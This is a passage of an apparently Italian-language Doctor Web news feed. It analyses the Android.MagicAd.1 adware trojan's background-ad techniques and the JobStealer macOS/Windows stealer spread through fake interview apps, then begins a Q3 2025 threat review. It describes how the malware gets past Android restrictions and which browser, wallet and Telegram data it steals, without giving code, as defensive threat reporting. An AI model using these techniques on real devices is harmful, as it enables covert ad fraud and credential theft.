&lt;p&gt;Se &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; non rileva attività sospette, nasconde la propria icona dalla lista dei programmi nel menu della schermata principale. Quindi crea un canale di notifica, attraverso il quale avvia diversi servizi malevoli di persistenza, che sono necessari per il funzionamento in background con la finestra dell'applicazione malevola chiusa. In seguito, il pianificatore attività di &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; crea un task per il riavvio periodico dei servizi che controllano l'operazione del canale di notifica e, se necessario, riavviano questo canale. Inoltre, in caso di funzionamento su dispositivi con versioni di SO Android relativamente vecchie, il trojan avvia uno schermo virtuale per evitare che il sistema interrompa il funzionamento di uno dei suoi componenti.&lt;/p&gt;

&lt;p&gt;Per visualizzare la pubblicità in modalità background quando la sua finestra è chiusa, &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; impiega una serie di tecniche che vengono selezionate in base al produttore del dispositivo infetto. Esse vengono implementate senza la richiesta esplicita dell'autorizzazione di sistema &lt;span class="string"&gt;SYSTEM_ALERT_WINDOW&lt;/span&gt;, la quale permette a un'applicazione di essere visualizzata sopra altri programmi.&lt;/p&gt;

&lt;p&gt;Indipendentemente dal metodo utilizzato, tutti i banner pubblicitari vengono caricati come activity traslucida, il che consente al trojan di disegnarli sopra le finestre esistenti.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;

    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Esempi di annunci visualizzati da Android.MagicAd.1&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Una delle tecniche viene implementata tramite intent indirizzati ad altre applicazioni. Essa consente al trojan di aggirare le restrizioni delle versioni moderne di SO Android che impediscono ai programmi di avviare se stessi. A seconda del modello di dispositivo infetto, tramite questa tecnica &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; o mostra gli annunci esso stesso o "costringe" direttamente i programmi target a visualizzare i banner pubblicitari.&lt;/p&gt;

&lt;p&gt;In una delle varianti di questo metodo, il target del trojan sono:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        il browser Mi Browser sui dispositivi Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        la shell grafica Miui SystemUI sui dispositivi Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        il launcher Amazon Fire TV Home Screen sui dispositivi Amazon TV.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tutte queste sono applicazioni di sistema sui relativi dispositivi, pertanto sono in grado di elaborare intent anche quando non sono direttamente avviate dall'utente. Fino a quando questi programmi sono attivi e possono accettare intent, &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; può utilizzarli per la visualizzazione di annunci.&lt;/p&gt;

&lt;p&gt;Va notato che se su un dispositivo Xiaomi Mi Browser è installato non come app di sistema, il trojan anche può utilizzare questo programma per la visualizzazione di pubblicità — fino a quando la finestra del browser non venga chiusa.&lt;/p&gt;

&lt;p&gt;Quando &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; scopre Mi Browser su un dispositivo adatto, invia un intent differito per l'avvio della pubblicità al proprio componente dex (rilevato da Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;). Quest'ultimo ne genera il proprio intent e lo passa al browser, il quale estrae l'intent originale e avvia la pubblicità in conformità ad esso.&lt;/p&gt;

&lt;p&gt;L'interazione con gli altri due programmi è leggermente diversa&amp;nbsp;— essi vengono utilizzati per reinvocare il trojan dalla modalità background. All'inizio &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; invia al modulo &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; l'intent differito per l'avvio della pubblicità, e quest'ultimo passa ai programmi target il proprio intent per il proprio risveglio. Se il target è l'app Miui SystemUI, essa invia in risposta il proprio intent per l'avvio del modulo. Il programma target Amazon Fire TV Home Screen, invece, avvia il modulo direttamente&amp;nbsp;— in base al nome del pacchetto. Avendo ottenuto il controllo, il modulo &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt; avvia la pubblicità che ha ricevuto nell'intent differito dall'applicazione malevola principale.&lt;/p&gt;

&lt;p&gt;Se il trojan non ha potuto mostrare la pubblicità, cerca di adoperare questo metodo altre due volte e, se fallisce, prova a mostrare la pubblicità direttamente, senza più utilizzare gli intent differiti e il proprio modulo dex malevolo.&lt;/p&gt;

&lt;p&gt;Un'altra variazione di questo metodo è simile a quella precedente e viene impiegata per sfruttare programmi sui dispositivi Vivo. La differenza è che l'avvio della pubblicità avviene tramite Android Binder&amp;nbsp;— il componente di sistema che fornisce l'interazione tra processi. In questo caso, il trojan ha come target i seguenti programmi di sistema:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        iManager,
    &lt;/li&gt;
    &lt;li&gt;
        Rubrica,
    &lt;/li&gt;
    &lt;li&gt;
        Vivo Browser,
    &lt;/li&gt;
    &lt;li&gt;
        Baidu IME Customized.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; li avvia tramite Android Binder inviando ad esso normali intent tramite il container di dati Parcel. Questi programmi quindi avviano il componente trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt;, il quale, dopo essere uscito dalla modalità background, mostra gli annunci.&lt;/p&gt;

&lt;p&gt;In &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; sono anche previste alcune altre tecniche per la visualizzazione di pubblicità durante il funzionamento in background, tra cui l'utilizzo del lettore multimediale. A differenza dei metodi mirati ai dispositivi specifici, questo è un metodo universale e funziona sulla maggior parte dei modelli di vari produttori. &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; decifra dal suo corpo un file audio e lo salva nella directory di lavoro. Quindi il malware avvia la propria istanza del lettore multimediale di sistema, imposta in essa il volume al minimo e la associa al sistema di gestione multimediale globale di SO Android. Successivamente per l'avvio della pubblicità &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; registra un broadcast receiver che intercetta i clic in questo lettore. Il trojan quindi tramite un comando adb speciale simula le azioni utente facendo clic sul pulsante di registrazione nel lettore, dopodiché chiude subito la sua finestra. La pressione del pulsante provoca l'attivazione del media receiver di sistema, il quale consente ad &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; di intercettare il controllo e avviare la pubblicità.&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space per dispositivi mobili rileva e rimuove in modo affidabile tutte le versioni conosciute del programma malevolo &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, pertanto per i nostri utenti esso non rappresenta alcun pericolo.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.MagicAd.1/README.adoc" target="_blank" rel="noopener"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15253&amp;lng=it</guid><title>Invece di un lavoro — dati e soldi rubati. Trojan stealer che attacca utenti di macOS e Windows è nascosto in false app per colloqui online</title><link>https://news.drweb-av.it/show/?i=15253&amp;lng=it&amp;c=9</link><pubDate>Wed, 27 May 2026 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;&lt;strong&gt;Gli esperti Doctor Web avvertono della diffusione di JobStealer, un programma trojan che ruba informazioni confidenziali agli utenti di computer con macOS e Windows. In primo luogo, è mirato al furto di dati da portafogli di criptovalute. I truffatori, con il pretesto di colloqui di lavoro online, attirano le potenziali vittime verso siti malevoli dove invitano a installare un'applicazione per videoconferenze. In realtà, questo software è il trojan JobStealer.&lt;/strong&gt;&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;L'attacco inizia con una mossa dei malintenzionati che contattano le potenziali vittime e offrono loro una specifica posizione lavorativa vacante. Invitano gli utenti a un colloquio di lavoro e forniscono loro link ai siti delle "piattaforme" di riunioni online — presumibilmente per consentire loro di connettersi a una videoconferenza. Questi siti hanno un aspetto presentabile, ma in realtà sono fraudolenti. Da essi, sotto le apparenze di un'app per videoconferenze online, viene scaricato il programma malevolo JobStealer. I cybercriminali utilizzano diversi design per tali risorse internet, nonché cambiano i nomi del software stesso. I nostri specialisti hanno trovato le varianti con i nomi MeetLab, Juseo, Meetix, Carolla e altri ancora. In alcuni casi, i cybercriminali utilizzano i nomi di servizi reali, come Webex.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Esempi di siti di falsi servizi di videoconferenza da cui viene scaricato JobStealer&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Per far credere agli utenti che le piattaforme siano pienamente funzionanti, i truffatori creano i relativi canali telegram e account sui social network, ad esempio, X.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.1.png" alt="#drweb"&gt;&lt;/a&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Per camuffare il trojan da software legittimo, i malintenzionati creano l'apparenza di attività sui social network&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Per l'installazione dell'applicazione sui dispositivi macOS, ai visitatori dei siti malevoli vengono proposte due opzioni:&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;copiare ed eseguire nel terminale il comando bash indicato sul sito web;&lt;/li&gt;
&lt;li&gt;scaricare il file dell'immagine disco in formato &lt;span class="string"&gt;.dmg&lt;/span&gt; e avviarlo.&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Si scarica il trojan JobStealer dai siti malevoli sia in forma di container dmg che eseguendo un comando bash nel terminale&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Nel primo caso, all'esecuzione del comando nel terminale, viene scaricato da internet ed eseguito automaticamente uno script che scarica e avvia il file eseguibile di JobStealer (viene rilevato come&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;Nel secondo caso, l'immagine dmg suggerita per il download contiene inizialmente i file sopra elencati. Una volta montato, visualizza le istruzioni su come "installare" l'applicazione. Le istruzioni indicano che l'utente deve aprire il terminale e trascinare nella sua finestra lo script allegato. In realtà, anziché installare il software per videoconferenze, lo script avvierà il file trojan.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Immagine con le istruzioni, visualizzata all'apertura del file dell'immagine con il trojan JobStealer&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;è un file contenitore eseguibile in formato Fat Mach-O, contiene codice binario per più architetture di processore — x64 e arm64. A seconda della piattaforma del computer infetto, all'avvio del trojan viene inizializzato automaticamente il componente corrispondente al processore target.&lt;/p&gt;

&lt;p&gt;Va notato che esistono diverse versioni di&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;. Le versioni meno recenti dell'applicazione malevola non supportavano il funzionamento sui computer Mac con architettura arm64. Inoltre, non includevano l'offuscamento — una funzione che gli autori del malware hanno iniziato ad aggiungere e rafforzare con l'aggiornamento del stealer.&lt;/p&gt;

&lt;p&gt;Una volta avviato, &lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;visualizza una finestra di phishing dove informa di un presunto errore di funzionamento. Per "risolverlo", il programma malevolo chiede all'utente di inserire la password del suo account.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Finestra di phishing in cui viene richiesta la password dell'account dell'utente di Mac&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Quindi&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;raccoglie i seguenti dati:&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;versione del sistema operativo e l'identificatore del computer;&lt;/li&gt;
&lt;li&gt;dati di circa 300 estensioni browser di portafogli di criptovalute, installate nei browser target su base Chomium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, CocCoc);&lt;/li&gt;
&lt;li&gt;file cookie da questi browser;&lt;/li&gt;
&lt;li&gt;password, nonché dettagli di carte bancarie, salvati nelle liste di compilazione moduli automatica del browser;&lt;/li&gt;
&lt;li&gt;file dell'applicazione di messaggistica Telegram dalle directory &lt;span class="string"&gt;/Library/Application Support/Telegram Desktop/tdata&lt;/span&gt; e &lt;span class="string"&gt;/Documents/temp_data/Apps/Telegram&lt;/span&gt;, dove vengono memorizzati le chiavi di autorizzazione della sessione, i file scaricati ecc.;&lt;/li&gt;
&lt;li&gt;note dell'utente dall'applicazione nativa Note di macOS;&lt;/li&gt;
&lt;li&gt;dati sulla presenza nel sistema delle applicazioni di portafogli di criptovalute Ledger Live e Trezor Suite.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Questi dati vengono compressi in archivio ZIP e caricati sul Server C2.&lt;/p&gt;

&lt;p&gt;Gli autori del malware hanno preparato una versione del trojan JobStealer anche per i computer con SO Windows. Le sue funzionalità sono analoghe a quelle della versione per macOS. Inoltre, su alcuni siti malevoli che distribuiscono lo stealer, sono previste sezioni per il download dell'applicazione su altri sistemi operativi popolari. Tuttavia, al momento, i nostri analisti dei virus non hanno registrato la distribuzione di tale software. Ad esempio, il pulsante di download del programma per SO Linux o è inattiva o porta alla versione Windows del trojan. Mentre le sezioni dedicate al download del programma per dispositivi basati su iOS e Android informano che queste versioni siano in fase di sviluppo. Allo stesso tempo, non si può escludere che in futuro i malintenzionati inizieranno a distribuire anche le varianti del trojan per queste piattaforme.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Siti malevoli potenzialmente possono distribuire le versioni del trojan JobStealer per Linux, iOS e Android&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Tutte le versioni conosciute dell'applicazione malevola JobStealer vengono rilevate ed eliminate in modo affidabile dai prodotti antivirus Dr.Web Security Space per macOS e Windows e non rappresentano minaccia per i nostri utenti. I siti fraudolenti che distribuiscono il trojan sono aggiunti al database delle risorse non raccomandate e pericolose e anche vengono bloccati da Dr.Web.
&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;amp;CK®&lt;/h3&gt;

&lt;p&gt;Abbiamo analizzato il malware JobStealer tramite il framework MITRE&amp;nbsp;ATT&amp;amp;CK®, una matrice che descrive le tattiche e tecniche dei cybercriminali che attaccano sistemi informatici. Sono state individuate le seguenti tecniche chiave:&lt;/p&gt;

&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;Fase&lt;/strong&gt;&lt;/th&gt;&lt;th&gt;&lt;strong&gt;Tecnica&lt;/strong&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Esecuzione&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;Esecuzione con la partecipazione dell'utente (T1204)&lt;/p&gt;
&lt;p&gt;Copia e incolla malevolo (T1204.004)&lt;/p&gt;
&lt;p&gt;File malevolo (T1204.002)&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Individuazione&lt;/td&gt;
&lt;td&gt;Individuazione di file e cartelle (T1083)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Raccolta dei dati&lt;/td&gt;
&lt;td&gt;&lt;p&gt;Raccolta automatizzata (T1119)&lt;/p&gt;
&lt;p&gt;Dati dal sistema locale (T1005)&lt;/p&gt;
&lt;p&gt;Credenziali dagli archivi di password (T1555)&lt;/p&gt;
&lt;p&gt;Accesso Portachiavi (T1555.001)&lt;/p&gt;
&lt;p&gt;Credenziali dai browser (T1555.003)&lt;/p&gt;
&lt;p&gt;Intercettazione dei dati di input (T1056)&lt;/p&gt;
&lt;p&gt;Intercettazione dell'input nell'interfaccia grafica (T1056.002)&lt;/p&gt;
&lt;p&gt;Archiviazione dei dati raccolti (T1560)&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Comando e controllo&lt;/td&gt;
&lt;td&gt;Servizio web (T1102)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Esfiltrazione dei dati&lt;/td&gt;
&lt;td&gt;&lt;p&gt;Esfiltrazione automatizzata (T1020)&lt;/p&gt;
&lt;p&gt;Esfiltrazione tramite il canale C2 (T1041)&lt;/p&gt;
&lt;p&gt;Esfiltrazione tramite il servizio web (T1567)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;
&lt;p&gt;Maggiori informazioni su&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Mac.PWS.JobStealer.1/README.adoc" target="_blank"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15061&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus in III trimestre 2025</title><link>https://news.drweb-av.it/show/?i=15061&amp;lng=it&amp;c=9</link><pubDate>Wed, 01 Oct 2025 13:24:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 ottobre 2025&lt;/b&gt;&lt;/p&gt;

&lt;section&gt;

    &lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento dell'antivirus Dr.Web, nel III trimestre 2025 il numero totale di minacce rilevate è diminuito del 4,23% rispetto al II trimestre. Allo stesso tempo, il numero di minacce uniche è aumentato del 2,17%. Il più frequentemente sui dispositivi protetti venivano rilevati i software pubblicitari indesiderati, i trojan pubblicitari e gli script malevoli. Nel traffico email predominavano gli script malevoli, i backdoor, e i vari programmi trojan, come downloader, dropper e password stealer.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

    &lt;p&gt;Gli utenti i cui file sono stati colpiti dai trojan ransomware di criptazione il più spesso affrontavano &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.35209&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt;, nonché &lt;b&gt;Trojan.Encoder.35067&lt;/b&gt;.&lt;/p&gt;

    &lt;p&gt;A luglio gli esperti dell'azienda Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15036" target="_blank"&gt;hanno parlato&lt;/a&gt; di una famiglia di trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Scavenger&amp;lng=it"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt;, creati per il furto di criptovalute e password. I malintenzionati li distribuivano con il pretesto di mod, cheat e patch per giochi. Questi trojan venivano avviati con l'utilizzo di applicazioni legittime, tra l'altro, tramite lo sfruttamento in esse delle vulnerabilità di classe DLL Search Order Hijacking.&lt;/p&gt;

    &lt;p&gt;Ad agosto i nostri analisti dei virus &lt;a href="https://news.drweb.com/show/?i=15047&amp;lng=en" target="_blank"&gt;hanno avvertito&lt;/a&gt; della diffusione di un backdoor multifunzionale &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; per dispositivi mobili, il quale era mirato ai rappresentanti di imprese russe. I criminali informatici lo gestivano in remoto, rubando per il suo tramite dati riservati e spiando le vittime.&lt;/p&gt;

    &lt;p&gt;Nello stesso mese il laboratorio antivirus Doctor Web &lt;a href="https://news.drweb.com/show/?i=15046&amp;lng=en" target="_blank"&gt;ha pubblicato una ricerca&lt;/a&gt; su un attacco mirato del gruppo Scaly Wolf a un'impresa metalmeccanica russa. I malintenzionati utilizzavano tutta una serie di strumenti malevoli, tra cui uno dei principali è stato un backdoor modulare Updatar. Per il suo tramite gli attaccanti cercavano di ottenere i dati riservati dai computer infetti.&lt;/p&gt;

    &lt;p&gt;Nel III trimestre gli analisti internet hanno individuato ennesimi siti falsificati del programma di messaggistica Telegram, nonché una serie di risorse fraudolente a tema finanziario. Inoltre durante gli ultimi tre mesi, i nostri specialisti hanno registrato la comparsa sullo store di app Google Play di decine di applicazioni malevole e indesiderate, tra cui i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che iscrivono utenti a servizi a pagamento, e i programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

    &lt;div class="colorful"&gt;
        &lt;h3&gt;Principali tendenze di III trimestre&lt;/h3&gt;
        &lt;ul&gt;
            &lt;li&gt;Diminuito il numero di minacce rilevate sui dispositivi protetti&lt;/li&gt;
            &lt;li&gt;Aumentato il numero di minacce uniche che hanno attaccato gli utenti&lt;/li&gt;
            &lt;li&gt;Comparsa di nuovi siti falsificati del programma di messaggistica Telegram e nuove risorse internet fraudolente a tema finanziario&lt;/li&gt;
            &lt;li&gt;Distribuzione delle applicazioni malevole &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Scavenger&amp;lng=it"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt;, che rubavano criptovalute e password&lt;/li&gt;
            &lt;li&gt;Backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; utilizzato per spiare rappresentanti di imprese russe e rubare dati riservati&lt;/li&gt;
            &lt;li&gt;Trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; sono la minaccia per dispositivi Android più diffusa&lt;/li&gt;
            &lt;li&gt;Calo dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; per il secondo trimestre consecutivo&lt;/li&gt;
            &lt;li&gt;Distribuzione di numerose minacce sullo store di app Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;

&lt;/section&gt;

&lt;section&gt;

    &lt;h3&gt;Secondo i dati del servizio delle statistiche Doctor Web&lt;/h3&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/01_stat_q3_2025_en.png" class="preview"&gt;
